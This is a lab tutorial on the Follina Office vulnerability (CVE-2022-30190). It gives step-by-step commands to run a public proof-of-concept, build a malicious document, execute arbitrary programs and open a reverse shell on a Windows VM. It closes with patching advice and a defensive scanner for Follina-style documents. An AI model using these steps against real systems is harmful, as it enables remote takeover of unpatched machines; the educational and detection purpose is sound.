CVE stands for Common Vulnerabilities and Exposures. In simple terms, it is the practice of assigning identifiers to vulnerabilities or security issues found in a computer system or software. The main purpose of CVE is to provide a consistent reference that organizations and users can use to track and manage their vulnerabilities effectively.
The security vulnerability CVE-2022-30190, otherwise known as "Follina", shocked the cybersecurity community in 2022 because of its potential to spread. It is a vulnerability in Microsoft Office products, particularly Word, that enables attackers to execute code remotely just by tricking users into opening a specially crafted document. It is particularly dangerous because it does not depend on macros being enabled, which makes blocking such an attack with traditional security measures harder.
Some sources about the discovery of CVE-2022-30190:
Keep your Microsoft Windows operating system updated by enabling periodic system updates.
Some resources on how to mitigate CVE-2022-30190:
- Debian 12 as the attacker (host computer)
- Windows 10 build 19044.1288 (running in a VM) as the victim
- VirtualBox
- The attacks in this experiment were only performed on the same local network
- The attack can be carried out from an outside network, but requires some tinkering
- The attack in this test was carried out with the antivirus disabled on the victim's computer
- The attack can only be carried out on Microsoft Windows operating systems that are old builds or that have not received new security patches since May 30, 2022, including Windows 10 and 11
Update the attacker's computer (the host, which here runs the Debian 12 operating system) with this command:
$ sudo apt update && sudo apt upgrade -y
Install Git if it is not already installed:
$ sudo apt install git
Install Python if it is not already installed:
$ sudo apt install python3
Install the "netifaces" module for Python 3:
$ sudo apt install python3-netifaces
Clone the payload repository created by John Hammond and change into its directory:
$ git clone https://github.com/JohnHammond/msdt-follina.git
$ cd msdt-follina
Run the payload, then move the follina.doc file located in the msdt-follina directory to the victim's computer:
$ python3 follina.py
Open the follina.doc file on the victim's computer. If the payload is successful, the calculator application will open.
To execute other programs, use the -c option (here I'm using an example that opens the Notepad application):
$ python3 follina.py -c "notepad.exe"
To deliver a reverse shell payload, simply use the following command:
$ python3 follina.py -r 9999
If the reverse shell payload is successful, you land directly in a shell in the victim's computer directory and can do whatever you want on the victim's computer.
As of July 22, 2022, this vulnerability has been patched by Microsoft, but that does not rule out the possibility that it can still have an impact on those who do not regularly update their Windows operating system. Therefore, do not forget to always update your operating system to keep cybercriminals from exploiting it. Cheers!
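As an added defensive example (not part of the original write-up or the msdt-follina project), the script below inspects a .docx package for two hallmarks of a Follina-style document: an OLE object relationship whose target is external (a remote HTML page that later invokes the troubleshooter) and the ms-msdt: URI scheme appearing anywhere in the package. The sample packages it builds are constructed test data; the 192.0.2.10 address and index.html path are placeholders.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def scan_docx(data: bytes) -> list:
    """Return findings for Follina-style indicators inside a .docx (zip) package.

    Indicator 1: a relationship of type oleObject with TargetMode="External",
                 i.e. the embedded object is fetched from a remote URL.
    Indicator 2: the literal ms-msdt: URI scheme in any part of the package.
    An empty list means neither indicator was found.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            part = zf.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(part)
                for rel in root.iter(REL_NS + "Relationship"):
                    if rel.get("TargetMode") == "External" and rel.get("Type") == OLE_REL_TYPE:
                        findings.append(f"{name}: external OLE object -> {rel.get('Target')}")
            if b"ms-msdt:" in part.lower():
                findings.append(f"{name}: contains ms-msdt: URI scheme")
    return findings


def build_sample(external: bool) -> bytes:
    """Construct a minimal .docx-like package for testing (constructed data, not a real document).

    external=True mimics a Follina-style relationship pointing at a remote HTML page
    (the trailing '!' on the target is commonly seen in such documents);
    external=False mimics a benign, locally embedded OLE object.
    """
    target = "http://192.0.2.10/index.html!" if external else "embeddings/oleObject1.bin"
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="{target}"{mode}/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_docx(build_sample(True)))   # external OLE target flagged
    print(scan_docx(build_sample(False)))  # []
```

To scan a real file, pass `open(path, "rb").read()` to `scan_docx`; a non-empty result is a reason to quarantine the document for closer analysis, not proof of exploitation.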